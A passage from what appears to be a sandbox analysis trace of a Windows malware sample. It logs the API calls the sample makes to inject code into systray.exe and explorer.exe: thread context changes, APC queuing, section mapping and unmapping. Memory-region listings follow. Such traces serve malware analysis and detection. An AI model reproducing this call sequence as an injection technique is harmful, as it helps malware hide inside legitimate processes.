[229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0124.561] NtSetContextThread (ThreadHandle=0xc4, Context=0x19de50*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x70, [65]=0xe3, [66]=0x33, [67]=0xb5, [68]=0xff, [69]=0xf, [70]=0x0, [71]=0x0, [72]=0x10, [73]=0xb4, [74]=0xb, [75]=0xa, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x55555555, SegGs=0x55555555, SegFs=0x6641a0, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0xcf648, SegCs=0x0, EFlags=0xffffffff, Esp=0xffffffff, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x46, [5]=0x2, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0xf7, [23]=0xa9, [24]=0xfd, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0x70, [29]=0x18, [30]=0x66, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x8d, [39]=0xa9, [40]=0xfd, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0xb5, [45]=0xdd, [46]=0xe7, [47]=0x4, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0124.562] NtQueueApcThread (ThreadHandle=0xc4, ApcRoutine=0x4e7ddd9, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0124.568] NtResumeThread (in: ThreadHandle=0xc4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0124.569] NtClose (Handle=0xc0) returned 0x0 [0124.569] NtClose (Handle=0xc4) returned 0x0 [0124.569] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32.dll", BaseAddress=0x19e05c | out: BaseAddress=0x19e05c*=0x75640000) returned 0x0 [0124.623] PostThreadMessageW (idThread=0x790, Msg=0x111, wParam=0x0, lParam=0x0) returned 1 [0124.701] NtDelayExecution (Alertable=0, Interval=0x19e0d4*=-30000000) returned 0x0 [0127.844] NtReadVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x4ec0000, Buffer=0x19e0f8, NumberOfBytesToRead=0x2a8, NumberOfBytesRead=0x0 | out: Buffer=0x19e0f8*, NumberOfBytesRead=0x0) returned 0x0 [0127.844] NtClose (Handle=0xbc) returned 0x0 [0127.844] NtOpenProcess (in: ProcessHandle=0x19f1d4, DesiredAccess=0x438, ObjectAttributes=0x19ea94*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea68*(UniqueProcess=0x374, UniqueThread=0x0) | out: ProcessHandle=0x19f1d4*=0xbc) returned 0x0 [0127.853] NtOpenThread (in: ThreadHandle=0x19f1d8, DesiredAccess=0x1a, ObjectAttributes=0x19ea94, ClientId=0x19ea60*(UniqueProcess=0x0, UniqueThread=0x38c) | out: ThreadHandle=0x19f1d8*=0xd0) returned 0x0 [0127.853] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\systray.exe", NtPathName=0x19e098, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\systray.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0127.853] NtCreateFile (in: FileHandle=0x19e0b8, DesiredAccess=0x120089, ObjectAttributes=0x19e080*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\systray.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e0a0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e0b8*=0xd4, IoStatusBlock=0x19e0a0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0127.853] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x508318) returned 1 [0127.853] NtQueryInformationFile (in: FileHandle=0xd4, IoStatusBlock=0x19e0a0, FileInformation=0x19dff8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19e0a0, FileInformation=0x19dff8) returned 0x0 [0127.853] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2a00) returned 0x50a820 [0127.859] NtReadFile (in: FileHandle=0xd4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x19e0a0, Buffer=0x50a820, BufferLength=0x2600, ByteOffset=0x19e010*=0, Key=0x0 | out: IoStatusBlock=0x19e0a0, Buffer=0x50a820*) returned 0x0 [0127.861] NtClose (Handle=0xd4) returned 0x0 [0127.862] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x6001) returned 0x50d228 [0127.863] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50a820) returned 1 [0127.863] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x0, ProcessInformation=0x19e404, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e404, ReturnLength=0x0) returned 0x0 [0127.863] NtReadVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x39d008, Buffer=0x19efc8, NumberOfBytesToRead=0x4, NumberOfBytesRead=0x0 | out: Buffer=0x19efc8*, NumberOfBytesRead=0x0) returned 0x0 [0127.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19eaac*=0x4b0000, RegionSize=0x19eab0, FreeType=0x8000) returned 0x0 [0127.868] NtReadVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x1020000, Buffer=0x50d228, NumberOfBytesToRead=0x6000, NumberOfBytesRead=0x0 | out: Buffer=0x50d228*, NumberOfBytesRead=0x0) returned 0x0 [0127.880] NtCreateSection (in: SectionHandle=0x19f264, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eab8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19f264*=0xd4) returned 0x0 [0127.880] NtMapViewOfSection (in: SectionHandle=0xd4, ProcessHandle=0xffffffff, BaseAddress=0x19f260*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eab8*=0x2e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19f260*=0x23e0000, SectionOffset=0x0, ViewSize=0x19eab8*=0x2f000) returned 0x0 [0127.882] NtMapViewOfSection (in: SectionHandle=0xd4, ProcessHandle=0xbc, BaseAddress=0x19ed20*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19ef4c*=0x2e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19ed20*=0x110000, SectionOffset=0x0, ViewSize=0x19ef4c*=0x2f000) returned 0x0 [0127.890] NtCreateSection (in: SectionHandle=0x19efc0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eac8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19efc0*=0xd8) returned 0x0 [0127.890] NtMapViewOfSection (in: SectionHandle=0xd8, ProcessHandle=0xffffffff, BaseAddress=0x19efc4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eac8*=0x6000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19efc4*=0x1f0000, SectionOffset=0x0, ViewSize=0x19eac8*=0x6000) returned 0x0 [0127.892] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50d228) returned 1 [0127.898] NtUnmapViewOfSection (ProcessHandle=0xbc, BaseAddress=0x1020000) returned 0x0 [0127.901] NtMapViewOfSection (in: SectionHandle=0xd8, ProcessHandle=0xbc, BaseAddress=0x19efc8*=0x1020000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19f1f4*=0x6000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19efc8*=0x1020000, SectionOffset=0x0, ViewSize=0x19f1f4*=0x6000) returned 0x0 [0127.920] NtResumeThread (in: ThreadHandle=0xd0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0127.924] ExitProcess (uExitCode=0x0) Thread: id = 9 os_tid = 0x3ac Process: id = "4" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x2315e000" os_pid = "0x78c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "3" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 491 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 492 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 493 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 494 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 495 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 496 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 497 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 498 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 499 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 500 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 501 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 502 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 503 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 504 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 505 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 506 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 507 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 508 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 509 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 510 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 511 start_va = 0x4d0000 end_va = 0x4d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 512 start_va = 0x4e0000 end_va = 0x4f6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db") Region: id = 513 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 514 start_va = 0x510000 end_va = 0x528fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db") Region: id = 515 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 516 start_va = 0x540000 end_va = 0x541fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 517 start_va = 0x550000 end_va = 0x57dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 518 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 519 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 520 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 521 start_va = 0x5b0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 522 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 523 start_va = 0x6c0000 end_va = 0x847fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 524 start_va = 0x850000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 525 start_va = 0x9e0000 end_va = 0x1ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 526 start_va = 0x1de0000 end_va = 0x21dafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed 